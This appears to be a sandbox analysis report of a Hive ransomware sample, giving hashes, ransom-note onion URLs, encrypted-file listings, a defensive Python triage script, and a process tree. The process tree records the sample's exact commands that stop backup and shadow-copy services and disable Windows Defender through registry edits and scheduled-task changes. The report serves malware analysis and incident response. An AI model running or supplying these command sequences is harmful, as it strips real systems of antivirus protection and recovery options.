Analysis
- max time kernel: 182s
- max time network: 124s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 12-01-2022 19:26
Static task: static1
Behavioral task: behavioral1
- Sample: c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
- Resource: win10-en-20211208
General
- Target: c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
- Size: 2.6MB
- MD5: e83823a144ac36854d9c007508c07e0a
- SHA1: 4a9fa6364b55f85dca3ab6862a2fd73b67191098
- SHA256: c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15
- SHA512: 6bc9e7f553991c1a17eb842f00d4f6562f7a2b6df41d5fc8818aae02258b09f23d180a30b3b036e0161b1f810cfb3683b95d22c90d7552ada0444478af430d07
Malware Config
Extracted from: C:\Program Files\7-Zip\vyS2_HOW_TO_DECRYPT.txt
Family: hive
URLs (Tor hidden services named in the note):
- http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
- http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes:
- MpCmdRun.exe (PID 1272)
Hive
A ransomware family written in Go (Golang), first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
- bcdedit.exe (PID 1920)
- bcdedit.exe (PID 620)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.

Drops file in Program Files directory (64 IoCs)
Process for every entry: c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
- File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png
- File created: C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_-QdHfhJgdIo0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_IP1QxnAExbA0.8zvpm
- File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_nYvWBHUVz2k0.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_AktY0Fb8tj40.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_x8wScbWpV0A0.8zvpm
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.INF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_q7mDP58Ue640.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_ppJWokR7gNc0.8zvpm
- File created: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\vyS2_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_9znLbMUVkOw0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_L0jB_2BzHVE0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_CsxtEScqIOc0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_OLHdCQs6qlM0.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_5oAyYdFdhGs0.8zvpm
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\settings.css
- File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_zcaawo9I91I0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_t8ybF_woHpI0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\TOC98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dpTWGEB2zlo0.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_HguxSk5_qJQ0.8zvpm
- File opened for modification: C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_eAoPrwCmf6M0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1NUNv85SfKE0.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_H9Sw2I-NhPQ0.8zvpm
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html
- File opened for modification: C:\Program Files\Windows Sidebar\ja-JP\sbdrop.dll.mui
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_aHyk0Cx-EoY0.8zvpm
- File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_Rz7rbldeanM0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Document Themes 14\Solstice.thmx.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_7VYzzCb49Bc0.8zvpm
- File created: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\vyS2_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_r1JsYqjHkfQ0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_fyyKrIIjZhw0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7FR.LEX.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1S0DkVNFyJE0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Stationery\1033\PAWPRINT.HTM.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dG0Y2VLVPZU0.8zvpm
- File created: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\vyS2_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_gNJm2LdGyeE0.8zvpm
- File created: C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1tc5K1JFgj00.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_MfOITshG0C40.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_4qfVfFrBGDc0.8zvpm
- File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_EKm8KedZVac0.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_xvsftD7L4eE0.8zvpm
- File opened for modification: C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_59CfPhvU4gc0.8zvpm
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_LFS10E66NZI0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_RQmmA2AZqb40.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1LEJ-ivifeA0.8zvpm
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png
- File opened for modification: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_S6nEgIoxBnA0.8zvpm
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_i6rkMkgC6hE0.8zvpm
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_POsspnLpQio0.8zvpm
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css
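The file list above has a fixed shape worth parsing rather than eyeballing: ransom notes are named vyS2_HOW_TO_DECRYPT.txt, and every encrypted file keeps its original name, gains a long base64url-looking token, and ends in .8zvpm; all of the tokens on this page open with the same 44 characters (QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_) and differ only in their last 12. The following is an added triage helper written for this report, not part of the sandbox output or of Hive. It assumes the name shapes just described, captures the note marker, token and extension instead of hard-coding them, and takes 40 as an assumed minimum token length so ordinary dotted names are not misclassified. The sample paths are a constructed subset of the IoC list.

```python
"""Triage file paths touched by the sample for ransomware artifacts.

Added example for this report, not part of the sandbox output. It sorts each
path into a ransom note, an encrypted file, or a file that was opened but not
renamed, and pulls out the token prefix every encrypted name shares.
"""
import re
from collections import Counter
from os.path import commonprefix

# <marker>_HOW_TO_DECRYPT.txt; the marker ("vyS2" in this run) is captured, not hard-coded.
NOTE_RE = re.compile(r"^(?P<marker>[A-Za-z0-9]+)_HOW_TO_DECRYPT\.txt$", re.IGNORECASE)

# <original name>.<long base64url-looking token>.<new extension>, the shape of
# every encrypted name in the IoC list (e.g. J0185790.WMF.QAVm...dIo0.8zvpm).
# Token and extension are captured rather than fixed, so other runs with a
# different token/extension parse the same way. 40 is an assumed minimum token
# length chosen to keep ordinary dotted names (foo.tar.gz) out of this class.
ENC_RE = re.compile(
    r"^(?P<orig>.+?)\.(?P<token>[A-Za-z0-9_-]{40,})\.(?P<ext>[a-z0-9]{3,8})$"
)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def dirname(path):
    return path.rsplit("\\", 1)[0]


def classify(path):
    """Return (kind, details) for one path."""
    name = basename(path)
    m = NOTE_RE.match(name)
    if m:
        return "ransom_note", {"marker": m["marker"]}
    m = ENC_RE.match(name)
    if m:
        return "encrypted", {"original": m["orig"], "token": m["token"], "ext": m["ext"]}
    return "untouched", {}


def triage(paths):
    """Summarise a batch of paths: counts, encrypted extensions, note markers,
    the shared token prefix, and every directory a note was dropped in."""
    kinds = {"ransom_note": [], "encrypted": [], "untouched": []}
    tokens, exts, markers = [], Counter(), set()
    for p in paths:
        kind, info = classify(p)
        kinds[kind].append(p)
        if kind == "encrypted":
            tokens.append(info["token"])
            exts[info["ext"]] += 1
        elif kind == "ransom_note":
            markers.add(info["marker"])
    return {
        "counts": {k: len(v) for k, v in kinds.items()},
        "extensions": dict(exts),
        "note_markers": sorted(markers),
        # The constant part of the token is shared by every encrypted file in
        # this run, so it is a usable hunt string for scoping the incident.
        "token_prefix": commonprefix(tokens),
        "note_dirs": sorted({dirname(p) for p in kinds["ransom_note"]}),
        "originals": [classify(p)[1]["original"] for p in kinds["encrypted"]],
    }


# Constructed input: a handful of the paths from the IoC list above.
SAMPLE_PATHS = [
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_-QdHfhJgdIo0.8zvpm",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_AktY0Fb8tj40.8zvpm",
    r"C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_59CfPhvU4gc0.8zvpm",
    r"C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt",
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\vyS2_HOW_TO_DECRYPT.txt",
    r"C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png",
    r"C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_PATHS).items():
        print(f"{key}: {value}")
```

Feed it the full IoC list, or a directory walk of an affected host, and the "originals" list tells you what was actually encrypted while "token_prefix" gives a string to search for on other hosts. Files that were only "opened for modification" but kept their names (the .png, .css and .mui entries) land in "untouched"; the report does not say whether they were altered in place, so treat that class as unknown rather than clean.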
Launches sc.exe
sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- vssadmin.exe (PID 540)

Opens file in notepad (likely ransom note) (1 IoC)
Processes:
- notepad.exe (PID 2532)

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
- powershell.exe (PID 1868)
- powershell.exe (PID 2136)
- c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe (PID 844)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes and the token privileges each enabled, in the order recorded (the page lists 64 entries and the final block stops mid-sequence):
- wevtutil.exe (PID 1760): SeSecurityPrivilege, SeBackupPrivilege
- wevtutil.exe (PID 1060): SeSecurityPrivilege, SeBackupPrivilege
- wevtutil.exe (PID 1928): SeSecurityPrivilege, SeBackupPrivilege
- wmic.exe (PID 1748): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (the last three reported by LUID number only)
- wmic.exe (PID 812): the same 20 privileges, in the same order
- wmic.exe (PID 812), second pass: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33 (list cut off here)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source PID -> target PID; each parent-to-child write appears three times in the report, and the page shows the first 64 entries):
- c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe (844) -> net.exe (1452) x3; net.exe (1452) -> net1.exe (760) x3
- 844 -> net.exe (428) x3; net.exe (428) -> net1.exe (1060) x3
- 844 -> net.exe (592) x3; net.exe (592) -> net1.exe (1596) x3
- 844 -> net.exe (1836) x3; net.exe (1836) -> net1.exe (432) x3
- 844 -> net.exe (1804) x3; net.exe (1804) -> net1.exe (1876) x3
- 844 -> net.exe (1040) x3; net.exe (1040) -> net1.exe (1504) x3
- 844 -> net.exe (1568) x3; net.exe (1568) -> net1.exe (952) x3
- 844 -> net.exe (1776) x3; net.exe (1776) -> net1.exe (1624) x3
- 844 -> sc.exe (968) x3
- 844 -> sc.exe (1288) x3
- 844 -> sc.exe (1752) x3
- 844 -> sc.exe (1732) x3
- 844 -> sc.exe (1276) x3
- 844 -> sc.exe (2028) x1 (list cut off here)
Processes
Process tree from the behavioral run. Indentation shows parent/child; the signatures the sandbox attached to a process are listed under it.

C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe (PID 844)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
  signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe (PID 1452)
    cmdline: net.exe stop "NetMsmqActivator" /y
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 760)
      cmdline: C:\Windows\system32\net1 stop "NetMsmqActivator" /y

  C:\Windows\system32\net.exe (PID 428)
    cmdline: net.exe stop "SamSs" /y
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1060)
      cmdline: C:\Windows\system32\net1 stop "SamSs" /y

  C:\Windows\system32\net.exe (PID 592)
    cmdline: net.exe stop "SDRSVC" /y
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1596)
      cmdline: C:\Windows\system32\net1 stop "SDRSVC" /y

  C:\Windows\system32\net.exe (PID 1836)
    cmdline: net.exe stop "SstpSvc" /y
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 432)
      cmdline: C:\Windows\system32\net1 stop "SstpSvc" /y

  C:\Windows\system32\net.exe (PID 1804)
    cmdline: net.exe stop "UI0Detect" /y
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1876)
      cmdline: C:\Windows\system32\net1 stop "UI0Detect" /y

  C:\Windows\system32\net.exe (PID 1040)
    cmdline: net.exe stop "VSS" /y
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1504)
      cmdline: C:\Windows\system32\net1 stop "VSS" /y

  C:\Windows\system32\net.exe (PID 1568)
    cmdline: net.exe stop "wbengine" /y
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 952)
      cmdline: C:\Windows\system32\net1 stop "wbengine" /y

  C:\Windows\system32\net.exe (PID 1776)
    cmdline: net.exe stop "WebClient" /y
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1624)
      cmdline: C:\Windows\system32\net1 stop "WebClient" /y

  C:\Windows\system32\sc.exe (PID 968)
    cmdline: sc.exe config "NetMsmqActivator" start= disabled
  C:\Windows\system32\sc.exe (PID 1288)
    cmdline: sc.exe config "SamSs" start= disabled
  C:\Windows\system32\sc.exe (PID 1752)
    cmdline: sc.exe config "SDRSVC" start= disabled
  C:\Windows\system32\sc.exe (PID 1732)
    cmdline: sc.exe config "SstpSvc" start= disabled
  C:\Windows\system32\sc.exe (PID 1276)
    cmdline: sc.exe config "UI0Detect" start= disabled
  C:\Windows\system32\sc.exe (PID 2028)
    cmdline: sc.exe config "VSS" start= disabled
  C:\Windows\system32\sc.exe (PID 1564)
    cmdline: sc.exe config "wbengine" start= disabled
  C:\Windows\system32\sc.exe (PID 1924)
    cmdline: sc.exe config "WebClient" start= disabled

  C:\Windows\system32\reg.exe (PID 1708)
    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 268)
    cmdline: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  C:\Windows\system32\reg.exe (PID 1036)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 564)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1596)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 808)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1168)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 660)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1152)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1524)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1392)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1620)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 560)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 1244)
    cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 912)
    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 1044)
    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

  C:\Windows\system32\schtasks.exe (PID 888)
    cmdline: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  C:\Windows\system32\schtasks.exe (PID 884)
    cmdline: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  C:\Windows\system32\schtasks.exe (PID 1616)
    cmdline: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  C:\Windows\system32\schtasks.exe (PID 1824)
    cmdline: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  C:\Windows\system32\schtasks.exe (PID 1852)
    cmdline: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

  C:\Windows\system32\reg.exe (PID 1320)
    cmdline: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  C:\Windows\system32\reg.exe (PID 612)
    cmdline: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  C:\Windows\system32\reg.exe (PID 2000)
    cmdline: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  C:\Windows\system32\reg.exe (PID 1696)
    cmdline: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\system32\reg.exe (PID 924)
    cmdline: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\system32\reg.exe (PID 1744)
    cmdline: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\system32\reg.exe (PID 1612)
    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 760)
